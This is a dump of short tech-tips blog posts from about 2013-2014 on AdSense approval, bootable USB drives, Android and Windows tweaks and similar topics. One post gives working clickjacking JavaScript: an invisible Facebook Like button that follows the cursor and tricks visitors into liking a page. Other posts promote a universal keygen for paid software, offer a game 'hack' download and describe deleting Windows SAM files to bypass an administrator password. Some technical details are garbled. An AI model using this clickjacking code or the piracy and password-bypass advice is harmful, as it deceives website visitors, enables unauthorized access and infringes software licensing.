Showing posts with label tricks. Show all posts
Showing posts with label tricks. Show all posts

16/10/2014

How to get Genuine Google Adsense Account in Just 10 Days - Quick Tips

Google Adsense is the best Advertisement network to earn money online via blogging.As we mentioned in out articles, blogging is the easiest way to make money online.If you're a good writer and you know some basics of SEO, then you can earn efficient money online with Google Adsense.

Google Adsense is required, because it gives best CPC rate and secure ads.There are some other ad networks like Popads, Infolinks, Bidvertiser, that can helps you to monetize your blog.It is very difficult to Approve Google Adsense. Google Adsense approval process is very strict and they have some policies that should match with your blogs policy.

<img src="http://v.gd/iXtPBw" alt="How to get Genuine Google Adsense Account in Just 10 Days" />

Normally Google only approve unique blogs.If you owned a blog, receive 100-200 daily unique visitors and no copy content then 100% you will get Adsense account.

I have Approved 2 Adsense account in just 10 days and i learned many things about Google Adsense in that 10 days.Today i will share my experience and also share how you can get your genuine Adsense account in just 10 days.Follow below steps.

1. Decide Unique Topic:

The first step is to decide a topic on which you want to make a blog.Choose unique topic.Many bloggers make blogs on technology news and programming sites.Keep in mind that, 98% tech blogs are rejected by Google.So take long time and select unique topic for you blog on which you can make quality articles.

2. Make a blog:

After selecting topic, you need to make a blog on which you want to get Google Adsense.You can choose either blogger or wordpress platform.

3. It's time to buy a Domain:

If you're planning to get Adsense account on blogspot domain then you're on wrong track.You can apply for Adsense on blogspot domain but that account is called hosted Adsense account, not genuine.You can not shows ads on custom domain.So i recommended you to buy a high-class domain like .com or .org.

4. Articles:

After setting environment, finally its time to decide your blog topics and start posting articles.Keep in mind that Google is very strict.So don't copy articles, even a single line.Always try to write unique articles and all the articles should contain minimum 500-600 words.Arrange your article in proper paragraph and lines.Don't use single lines.

5. Number of Posts:

How many posts are required to apply got Adsense? Many users asked this question as it is very important.Your Adsense approval is fully dependent on your articles.According to my experience, You have to make minimum 10-15 unique articles to get Adsense account.

6. Images and Videos:
It is very effective to add images and videos to your articles.Don't use copyrighted images and videos, otherwise your blog will be removed soon.Also, don't use so-much flash content.Give credit to image author.Add ALT tags to your images.

7. Sitemap, Privacy policy, Disclaimer:

Add Sitemap, Privacy policy, and Disclaimer page to your blog.If you don't know how to make a Privacy policy then you can Google it.Many free websites are available online to create a privacy policy.Create a sitemap of you blog and also disclaimer page.Submit your sitemap to different search engines.Check our website's policy and disclaimer.

8. About US and Contact US:

Add about us and contact us pages to your blog.It is required because, it helps visitors to contact.

9. Add Robot.txt to your blog:

Add robot.txt file in your blog.Robot.txt is a collection of codes that contains the rules for the bot-crawlers about how they will index your website / blog.Many seach engine like Google, use Robot.txt file to index the web content,and for many other reasons.For more details check this article.

10. Do some SEO:

Search Engine Optimization is required to indexing and crawling your blog.Do some SEO for your blog to index your articles into Google search list.Use bold, italic and underlined keywords in your articles.Include internal links to your articles.

11. Finally Apply for Adsense:

While applying for Adsense, use your professional email ID like xyz@yoursitename.com or you can use yoursitename@gmail.com.Keep in mind that, Google Adsense process is divided into two steps.Don't make any change after applying for Adsense, event don't open your blog.

After 2-3 hour, go to Google.com/adsense.If you have successfully completed first step then you can login into Google Adsense account.After log in, accept Google Adsense terms and condition and then immediately place ad code on your website.Just create one block of size 300x250 and place it to blog's sidebar.That's it.Now wait for Google's email.Generally it takes 2 to 3 days.If you follow all the above steps carefully then you will definitely get Adsense account in just 10 days.

If you have any questions then please tell us using comments.

06/10/2013

Increase Your Facebook Likes using JavaScript

Today i have found one more interesting trick to increase your Facebook Likes.Social Networking sites like Facebook and Twitter plays an important role to increase your traffic.You can increase your Facebook likes using JavaScript.


Visitors just need to click anywhere on the webpage as a small invisible like button will follow his mouse cursor.You can implement this JavaScript code into your website or blog.

Follow this steps:
  • Go to blogger and select template and go to Edit HTML.
  • Then,Search for </head> in your blogs HTML and paste the below code above it.


  <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript">  </script>  <script type='text/javascript'>  function ClickJackFbHide(){  jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).hide();  }  function ClickJackFbShow(){  jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).show();  }</script>
  • Search for </body> and paste below code above it.
<div id="clickjack-button-wrapper-5" style="position: absolute; opacity: 0; filter: alpha
(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)';
 margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden">
<!--<div style="position: absolute; top: 5px; left: 5px; z-index: 1000;
height: 13px; width: 15px;"></div>-->
<iframe src="http://www.facebook.com/plugins/like.php?href=Fanpage URL Link
&amp;layout=button_count&amp;show_faces=false&amp;width=50&amp;action=
like&amp;
colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none;
overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe> </div>  <script type="text/javascript">
 jQuery
(document ).ready
( function() {  $( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e )
 {  jQuery( "#clickjack-button-wrapper-5" ).css( {  top: e.pageY - 10,
 left: e.pageX + 30  } );  } );  clickjack_hider();  var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);  } );
 function clickjack_hider(){  jQuery("input").mouseout(function()
{ClickJackFbShow();});  jQuery("a").mouseout(function(){ClickJackFbShow();});  jQuery("button").mouseout(function
(){ClickJackFbShow();});  jQuery("textarea").mouseout(function()
{ClickJackFbShow();});  jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();});         jQuery("object").mouseout(function(){ClickJackFbShow();});  jQuery("input").mouseover
(function(){ClickJackFbHide();}); jQuery("a").mouseover(function(){ClickJackFbHide();});  jQuery("button").mouseover(function(){ClickJackFbHide();}); jQuery("textarea").mouseover
(function(){ClickJackFbHide();});  jQuery(".ratingblock").mouseover(function(){ClickJack
FbHide();}); jQuery("object").mouseover(function(){ClickJackFbHide();}); }</script>
  • Replace "URL of Facebook Page with your Facebook Page URL" and Save It.

13/09/2013

How to Set Custom Ringtone on Nokia Lumia Without Zune

Nokia Lumia is a windows based smartphones series from Nokia.It runs on Windows 7.5 and windows 8.In android and other devices you can set your favorite ringtones for incoming calls but in Lumia you can not set custom ringtones using your phone.You have to download Windows Zune software for your PC allows you to sync your Lumia device.

If you want to download Zune software then you can Download here.

But there are another simple way to set custom ringtones on your Nokia Lumia.You don't need to download Zune software.Today i am going to post one simple solution for setting custom ringtones on Nokia Lumia without windows Zune Software.You have to remove all the tags from your ringtones then you can able to access it as your ringtone.

keep in mind that your Ringtone should be less than 1 MB and the Ringtone must be less than 40 s long.

Follow this steps:
1.Download This Software for remove Tags from your Ringtone.


2.Connect your Nokia Lumia with your Computer.It will automatically find your device after some time.
(You should have internet connection for the first time connection.)
2.Install it on your Computer then open it.
3.Then click on File and select "change directory" or press "Ctrl + D".

4.Browse your ringtone folder or ringtone and select it.

5.Select all the ringtones by pressing Ctrl + A.Right click on it and select "Remove tag".Select all ringtones again.Right click on it and select "Save Tag".Now open your ringtone folder and copy all the selected ringtones to your Phone > Ringtones.

6. On your Nokia Lumia, open setting and select "Ringtones and sound" and select your ringtone.

01/09/2013

Ankit Fadia's Ethical hacking eBooks Collection

Ankit Fadia is a indian hacker and computer security expert.He as written somany books on computer security.At the age of 15 he wrote his first book on ethical hacking published by Macmillan India.Ankit Fadia started a website called "HackingTruths".

<img src="http://freetechware.blogspot.com/" alt="Ankit Fadia Ethical Hacking ebook Collection  ">


Contents:
  • The Unofficial Guide to Ethical Hacking 
  • Email Hacking 
  • Windows Hacking 
  • Network Security: A Hackers Perspective
  • The Ethical Hacking Guide to Corporate Security
  • Hacking Mobile Phones
  • Google Hacking 
  • Intrusion Alert 
  • Encryption

29/08/2013

How To Change Fonts in Android Devices Root Required

Android  is a game changer for the mobile development community.It gives all the best features and quality environment.One thing that all like about an Android is,we can customize all the thing that we want.Font is one of the important part of User Interface.But today you can see same fonts in all the smartphones.Just because of you are choosing this smart platform you can solve this problem.There are many applications and tricks to change your Android devices Fonts.
If your phone is  rooted then we have something for you.iFont is a free android application that allows user to change their fonts.

Follow This Simple Instruction to Change your Android Fonts:
  • Download & install iFont on your Android Device.

  • Open Application.
  • Remember that You should have proper internet connection on your android device.
  • Wait for sometime,It will collect fonts that available on the internet.
  • You can see some options such as English,Japan and many other.Select your language from options.
  • Now you have a list of Fonts on your screen.Just select any Font and see its preview.
  • If you like it then don't wait, Just press download button.
  • After few second you have an option that ask you to install your selected Font.Select Install.
  • Your phone will reboot and after reboot you can see that you have successfully installed new Font.Congress!!

01/08/2013

Add Windows 8 UI to Google Chrome



If you are a big fan of windows 8 then you have to check this post.Most important feature that makes windows 8 different from any other Operating system is Windows 8 UI.There are many applications and tools available that can change your UI like in Windows 8.


You can install Windows 8 UI in Google Chrome using iStart.iStart is a new tab page for Google You can enjoy the tiles and the UI design of Windows 8 provided you have Google Chrome browser installed in your machine.

Features:
  • You can install or remove new links


  • Add custom Background

  • You can search on your installed links directly.

16/07/2013

Sony Xperia S Launcher Download For Android

The Sony Xperia S launcher has just received a new update and it contains all the functions of the official Sony launcher.Launcher is one of the most important feature of Android and it makes your smart phone really smart.You can replace your favorite launcher with installed launcher.

There are many launchers available on the Google Play Store such as Next launcher,Go launcher,Holo launcher,etc.You can download and install your favorite launcher from Google Play Store.


Sony Xperia S launcher is a completely modified launcher for all the android devices.Even users can run this launcher on their low memory android phones.


12/07/2013

How To Download YouTube Video Without any Softwares

YouTube is a world's most popular and largest video sharing website.YouTube is also a search engine.You can search your favorite songs,softwares,tutorials,tricks,etc using YouTube.YouTube offers free uploading and watching services and even you can make money on YouTube.


It very east to watch your favorite videos online but sometimes you have to buffer again and again.Officially YouTube itself doesn't allow to download videos but there are many software available which allows us to download YouTube videos such as YouTube downloader, IDM,etc.

But if you don't want to install any softwares to download YouTube videos then you can do this.But you must have installed Java on your browser otherwise its not work.Its free of cost.You can install Java from here.

Lets have a look at how to do it.

First Method:

1. Go to YouTube and click on the video you want to download. You don't need to buffer the video.

2.Now in the URL bar you can see the link like this.

3.Now Replace "YouTube" with "savemedia".

4.Now, select your video formats in which you want to download your video.There are so many formats available such as avi,flv,mo4,mkc,HD,etc.

Second Method:

1.Go to YouTube and click on the video you want to download. You don't need to buffer the video.

2.Now in the URL bar you can see the link like this.

4.Now,Replace "www." with "ss" and press Enter.IF you are mobile user then replace "ss" with "m".

5.Select your format and download your favorite videos.

That's how you can download a YouTube video very easily without the use of any cumbersome software. 

08/05/2013

How To Trace an Email Sender location

Email- electronic mail, we all are using this service to transfer documents and small data over the internet and it is free.So because of it is free, anyone can use it and send documents for free to anyone in the world.So there are many possibilities of spamming and illegal activity over the internet.Some vendors buy list of emails from any company or institutions and send mail about their new product.This is called an email marketing.If you want to know more about email marketing then Google it.

Sometimes we get Emails from unknown users.It is very necessary to know that who is a sender to Protect your mails and data from hackers.There are lots of Spam emails  received everyday in the world.Today Cyber crimes are increasing more and more.So,everyone should know that how to trace email which is comes from unknown users.

Well, this wrong emails are normal, but sometimes w receives some frauds emails like give me your ATM number or bank account number.In these critical situations, you have to inform cyber cells or trace senders location.It is not possible to trace exact location for us, but atleast we can trace its approximate location.If situation becomes more critical then you have to complain about this activity in cyber cell.

There is an online website that can analyze the header and gives complete detail about the sender like IP address which is used to find the person,Mail server used,Service Provider etc.Email Tracer traces up to an Internet Service Provider level only.Further tracing can be done with the help of an ISP and law enforcement agencies.You should have permission to access it if you want.


You should follow these instructions carefully:

1.Log in in to your mail account(here we follow this steps in Gmail).

  Similarly you can try this trick for Yahoo,Hotmail,etc. 
  Click Here for finding header in different mail account

2.Go to mail that you want to trace.


3.Click on Replay button and then go to show original.



4.Copy all the text and paste into the website.

5.Then Click on Start Tracing.

6.It will trace sender's IP location,Server provider etc.

More To Read:

17/04/2013

How To hack Temple Run OZ


Temple Run Оz is the most dangerous adventure passing on the road from a gold brick You are waited for by amazing game world, immersing in the movie atmosphere. You should fly by a balloon, and investigate a set of game locations. Escape from furious baboons, dangerous obstacles, slide and jump.This is one of the most popular game in the world, available for Android and iOS platform as it is a infinite game.
  • Stunning environments
  • Explore different locations
  • The environment changes as you run
In this Post i will show you how to hack temple run OZ to have unlimited coins and gems.Temple Run OZ is a new version of Temple Run.Temple Run is a most Popular Game and breaks all the records. You will get unlimited coins and gems in the game with this hack. You will be able to get more power in the game.When you have unlimited coins,the game becomes more interesting


HowTo Hack:

1.Download Zip File


2.Extract it to Android>Data folder of your SD Card.


3. Now install Temple run game and start.You will get unlimited coins.

27/03/2013

How to use VLC Player as a Recorder

A recorder is a gadget that can record voice from any external as well as internal source.When we start this recorder, it automatically start recording out voice and along-with our voice, it also records another sounds like vehicles noise.It capture signals and record this signals in its magnetic tap.When we want to listed voice, all we need to do is just listen that tap.There are many recording softwares are available on the internet that can record your voice from your computer without any gadgets.These all softwares are very costly but if you're using this softwares for professional use then you have to use those all softwares.

But if you want to record voice or any favorite songs for your personal use then you don't need to purchase those all softwares.You can easily record all your favorite songs and videos and also you can create your own ringtones using this method.

Today we are going to reveal one new and simple method to record songs and videos using VLC player.Now you all guys are already familiar with VLC player.VLC Player is a free and open source multimedia player which allows us to play all the multimedia files such as mp3 & video.you can play almost all multimedia files into the VLC player.But you can record your favorite video clips with the help of VLC Player. First of all you need to download latest version of VLC Player.

Also Check: Increase Your Facebook Likes using JavaScript

Here are a complete list of supported file: MPEG ES/PS/TS/PVA/MP3, AVI, ASF/WMV/WMA, OGG/OGM/Annodex, MP4/MOV/3GPP, MKV, WAV, DTS WAV, Raw DV, Raw AAC, Raw AC3/a52 audio, Raw DTS audio, and FLAC audio. The MPEG-1, MPEG-2, DivX 1/2/3, MPEG-4/DivX 5/XviD/3ivX D4, Sorenson (SVQ 1/3), DV, Cinepak, Theora, H263/H263i, MJPEG A/B and WMV 1/2 video codecs are supported by default. [Source: softpedia]

Download From Here

1.Download and install VLC player on your computer.


2.Open VLC Player.Press "Shift+R" for recording or cutting and again "Shift+R" for finish Recording.

OR

3.Open VLC Player and click on "view" and then "Advanced Controls".

4. Now,You can see record button at the bottom of the VLC.


5.click on Red Button to record.
6.You can see your recorded items in My Videos Folder.


How to permanently delete facebook account

Facebook is a world's most popular social networking website and People don't want  to delete their Facebook account.If anyone really wants to delete their Facebook account then check this post.Today I will tell you how  to permanently delete Facebook account.Follow this simple steps:

1.Go  to this Link:


https://www.facebook.com/help/contact.php?show_form=delete_account

2.Enter your password and captcha code.then click on "Delete my account".


3.Do not Log in  to your facebook account for 14 Days.


4.Clear all facebook data and disconnect your account from other sites.

5.Wait for 14 days,After 14 Days your account will permanently  delete.

26/03/2013

How to Install Windows 7 drivers on windows 8 : Simple Trick

If you have many computer gadgets like web-camera, printer, scanner, DVD drive, wireless keyboard and mouse, then you know that all these gadgets require their own drivers.You can not directly connects to your computer without installing specific drivers.Drivers contain bunch of codes or commands for operating system to handle that new gadget.

A driver something like software & always provided by a hardware maker.Drivers tells the computer system how to work with that hardware.When you install new operating system you must download its own driver every time because your new OS not support them.But now you do not need to download every time the driver.We all use gadgets such as a printer, scanner, web camera etc.we have to install the driver for each gadgets before use it.

Almost all the computer runs on Microsoft's Windows Operating system.The company keep changing their product regularly.With the every new update, it requires new drives.So you have to install new updated drivers after updating your operating system.But sometimes we can not find new drivers, then we have to install older version of operating system.But now you do not need to download the new driver for the new operating system.Today we are going to tell you about trick that can help you to install old driver in new operation system.



Follow simple steps:

1.Open your Start Menu and press "windows key+w".Search for

   Troubleshooting in the search bar. 

2.Open Troubleshooting.you can see this menu.


3.Click on "Run programs made for previous versions of Windows" & then     click on "Next".It will find issues on your computer.After this process you will see some list,click on "Not listed" and then click on "Next".

4.Click on browse button and import drivers that you want to install and click on "Next".Then check this box "The program worked in earlier versions  of Windows but won't install or run now".

5.Select your previous operating system in which drivers were working  and 
click on "Next".

More To Read:

24/03/2013

How to delete Autorun virus using Command Prompt

Today we will tell you about some interesting trick.You can remove autorun virus using cmd. Autorun virus is virus which writes automatically on a flash drive and infect user’s computer when they Use that infected Flash drive.With the help of this trick you can easily remove Autorun virus using cmd. Just follow this simple steps.

Method 1:

1.Open cmd and type your drive "name:"if you want to find Autorun in c drive then type "c:".

2.then type "attrib" and press enter.

3. If there are any autorun.inf just type "C:attrib -s -r -h *.*".

4.after this process quickly remove your flash drive and restart your computer.

Method 2:



1.Open a command prompt and type this code:



2.del/a:right side [Drive Letter]:autorun.inf



3.Simply replace [Drive Letter] with your drive name.

  if there is any autorun virus you will get autorun.inf.

4.Type follow ing code.

5.del/a:right side D:autorun.inf

6.Restart the computer and Finish.

18/03/2013

Make your Pendrive Bootable Without any software

When we want to format or install new OS on computer,we generally use CD drive.but when you don't have any CD drive then? you know you can format or install new operating system using your pendrive.First Check Your computer support the USB booting or not? and you need windows OS.

1.Open Command Prompt.(Just Go to Run and type cmd and hit the Enter Key,you can see black window)


2.Type "diskpart" in cmd and press Enter Key.It will open new window.



3.Insert your pendrive into USB port and type in cmd "list disk".You can see new windows like this. you can see your hard disk and pendrive here.Here Disk 1 is a pendrive.
4.Type in cmd "select disk 1".
(If your pendrive is disk 1 write select disk 1 if not,replace '1' witha your disk number.) You can find Disk 1 is now selected
After this type "detail disk".you can see all the details of your pendrive.
Then type "clean".
5.Type these commands one by one.

"create partition primary"
"select partition 1"
"active"
"format fs=fat32 quick"

NOTICE:Don't change any command.


It will take some time.

6.After this type "assign"and hit the Enter key.
  Now You can see your pendrive folder.

7.After this type"exit".


7.After this process your pendrive is now bootable.Now copy .iso from winsows CD and paste to your pendrive.


Step By Step Command:

1.diskpart
2.list disk
3.select disk x (here "x" is the number corresponding to the USB disk Number)
4.clean
5.create partition primary
6.active
7.format fs=fat32 quick
8.assign
9.exit


There many other tools available on the internet to make your pen drive bootable within a few seconds.But i suggest this method to make your pen drive bootable.If you cannot understand this method then feel free to contact us or you can also comment below.If you have any other simple method then please tell us.

More To Read:

13/03/2013

How to Delete administrator Password for Xp users

You all want to protect your computer from other users.The best way to protect computer is to keep administrator Password.It provides great security to your system.When any unauthorized user trying to access your system without your permission then it will prompt one small window and tell that user to enter password.Without password, that user can not access your system.

Some times it happen that, you forgot the windows administrator password.It very serious problem if your all the important data are saved into your system.The only solution of this problem is to format your system.But it delete all your important user data saved in system drive and another user folder.Here is a quick trick to delete administrator password and access system.So, kindly follow all the steps and if you have more suggestion then you can tell us.



Method 1:
  • Boot up with DOS and delete the sam.exe and sam.log files from Windows\system32\config in your hard disk.
  • when you boot up in NT the password on your administrator account which will be blank.This trick is work for only FAT hard drive.
Method 2:

1.Put your hard disk in other Computer.


2.Start and Boot that computer and use that hard disk as a secondary drive.


3.Then open that drive in which the window is installed.


4.Go to location windows>system32>config


5.delete SAM.exe and SAM.log 


6.Now remove hard disk and put in your computer ans start.Enjoy...

31/01/2013

Glass Skin Pack For Windows 7 32/64 Bit

Skin packs are designed to change look of your system without changing system completely. Skin packs are collection of some system files that can take place after installing them.When you install skin packs on your computer, then it can replace their new files, images, effects and new user interface with your old system interface.You can also change these all files manually but we know the location of these files or it is accessible or not.

So to solve these problems, skin packs came into the picture. It is very easy to customize Windows operating system theme and also design and effects using skin packs.Not only this glass skin pack is available for windows operating system but there are thousands of more and amazing skin packs are available for free download for window based operating system.You can install Mac, Android, Linux, Angry Bird and many other skin packs on your computer for free.

One of the most interesting feature of windows 7 and later versions of windows is, you can actually customize them.There are so-many custom themes are available for Windows 7 and these themes can completely change look of your system.If you are bored, using the same color windows and same color folder, them you should try this unique skin pack for windows 7.


Glass Skin Pack is specially designed for windows 7.It is a theme pack for windows 7.There are many skin pack for windows 7 but this different.in this skin pack Your screen become Transparent Glass.Glass Skin Pack is a tool to automatically install the original beautiful theme, designed for Windows 7. After installation of this topic that you have open windows and other graphics will look more like a transparent glass plate, hence the name of the style is Glass Graphical user Interface.

For install this Skin pack, just download setup of Glass skin pack as your bit(32/64).Restart PC and change some necessary changes and make your screen like transparent glass.

Download here: Download (32 bit)(64 bit)

More To Read:

08/01/2013

Add Background Wallpaper On USB

USB drives are the external flash devices used to transfer data between computers and it is available in different storage sizes.You can copy, paste and delete data available on USB flash drive.When we open USB drive, we see only our data with only white background.If you don't like this white background and you're bored then here is something tricky for you,.

This is a Tricks For Windows 7/Xp users.You can set your own background on your USB.You all are very bored because of there are only single white screen for USB folder. You can set your own Screen Wallpaper on Your USB and Make your USB folder Beautiful. Just Follow this simple steps for set background.

1. First of all Copy this simple HTML code and paste into your text editor.


Code:


[.ShellClassInfo]

IconFile=%SystemRoot%\system32\SHELL32.dll
IconIndex=127
ConfirmFileOp=0

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]

Attributes=1
IconArea_Image=“YourPictureName.jpg”
IconArea_Text=”0xFFFFFF”
VeBRA sources – don’t delete the tag above, it’s there for XXXXX purposes -
[ExtShellFolderViews]
{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}

[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]

PersistMoniker=Folder.htt
PersistMonikerPreview=%WebDir%\folder.bmp

2. Now,Se in this code,You can see "YourPictureName.jpg". Just Replace this with your picture name like "Freetechware.jpg".

3. Then,Save this file as "desktop.ini".

4. Cut and paste this file and your Background Picture to your USB Drive
    and Hide It.

5.Now,Refresh and enjoy.




Here is the tutorial for XP users:

1. Copy Paste the following code in the notepad and rename that notepad file to desktop.ini (Just make sure when you paste this code, the Double Quotes are in Notepad format otherwise type the Double quotes manually from your keyboard.)
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
iconarea_image=“back.jpg”
iconarea_text=”0xFFFFFF”

2. Choose any image of your choice and rename it to back.jpg.

3. Copy Paste both these files (i.e. desktop.ini and back.jpg) into your USB device and make them hidden by selecting Properties -> Hidden Files.

4. That’s it. You are done.Reload your computer screen and you'll see your selected background.Enjoy.

For Windows 7 users:

1.Open Notepad, Copy & Paste the code below, save it in your flash disk then rename as "desktop.ini" (without quotation).

CODE:

[AveFolder]
IconArea_Image=bg.jpg
ShadowedText=1
Recursive=1
TextR=0
TextG=0
TextB=0

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
iconarea_image="bg.jpg"
iconarea_text="0xFFFFFF"

2.refresh the drive.

Note: "bg.jpg" is the filename of your background image which should be located in the root folder of your flash disk..

Credits:
W7FBC.exe

The | Exelent

07/01/2013

Universal all software Keygen Generator 2013

Many softwares needs serial key to install but when we download these softwares from the internet, we didn't get any serial keys with them.So we have so find any another alternative of that software.Sometimes, we have to buy a serial key to unlock that software.But if you find serial key of any software then ?I am not jocking. You.You can find serial key of any software without using the internet and it is 100% working for me and i hope it works for you also.Just select your software and get serial key.You can do this magic using Universal Keygen generator.

Universal all software Keygen Generator 2013 is a latest version of key generator. This software is a combo package of lots of softwares Keygen. Universal Keygen generator is a tool used to generate key of any software that you want.You can download your desired software for free but you can use it for life time.You have to buy that software for life time use.Universal Keygen generator helps you to activate any software and you can use that software for the life time.

Using this tool, yoy can find serial key of any software and one most important thing is that it won't use the internet connection.This is not a fack tool as many fake tools are also available on the internet to register softwares.This tool is safe and very easy to use.This tool is most popular tool and you can generate serial key for any software like Total video converter,  Driver River, Driver checker, Nero and so on.

First of you have to download this software from the link provided above and then install this software on your computer.Then  open this tool and find your software or type software name and generate keygen for that software.This tool is fully compatible with Windows 7 and Windows 8/8.1 operating system.


Here are some features of Universal Keygen Generator :
  • Generate all software Serial Key
  • Offline use
  • Search Your Software Serial by it names
  • Find Your Serial keys very easily
  • easy to use and safe
Just Type your software name and click on Generate Keygen.You will see key on your screen.just copy and paste this key.


06/01/2013

How To Run Whatsapp on PC

Whatsapp is the most popular free messaging application for smartphones.It is available for different mobile platforms like iOS, Android and Windows.Users can send unlimited messages for free using Whatsapp application installed on their devices.Don't worry it free and it doesn't require any SIM card, as it uses your internet.Not only text messages, but you can send images, videos, contacts and even voice messages using Whatsapp application.It takes few seconds to reach its destination without any disturbance.

While playing android game on your smartphone, has the idea of playing them on PC ever come your mind.Whats app is Most Popular messenger on Play store and this is a best way to chat with friends,of course free of cost. Whatsapp can allows you to share and chat anytime & everywhere in the world.With this app you can share your videos,Photos,Voice messages and text within a few seconds.

Now, I will teach you how to Use Whats app Messenger and other android app free on PC or Laptop, even if you don’t have a smartphone.Blue Stacks App Player is a software and one of the best Android emulators that enables to run Android apps on Windows PC.Using Blue Stacks App Player, you can install almost any application your computer.Even you can install most popular mobile games like Subway surfers, Temple Run and Angry Birds on your computer.You don't need to install any third party Android operating system boot image and another softwares to install any Android application on your computer.Just install this Blue Stacks App Player and enjoy.


Follow this Simple Steps:

1. Go to start and type in search box"start blue stacks".

2. When This Software has been loaded go to search box and type "whats app  
messenger".Download It and Install.



3. After Installation this App Install and click on Agree to Continue.Here Your whatsapp has been installed on your PC.
4. Open it and Verify your mobile number just like you install it on your phone and click on continue.

5. Here you have to manage screen.Enter your screen name and upload picture.

6.Whats appis automatically Import Mobile Numbers on your mobile but on  PC you must have to import Numbers Manually and wait till your friend will  join you.

More to Read: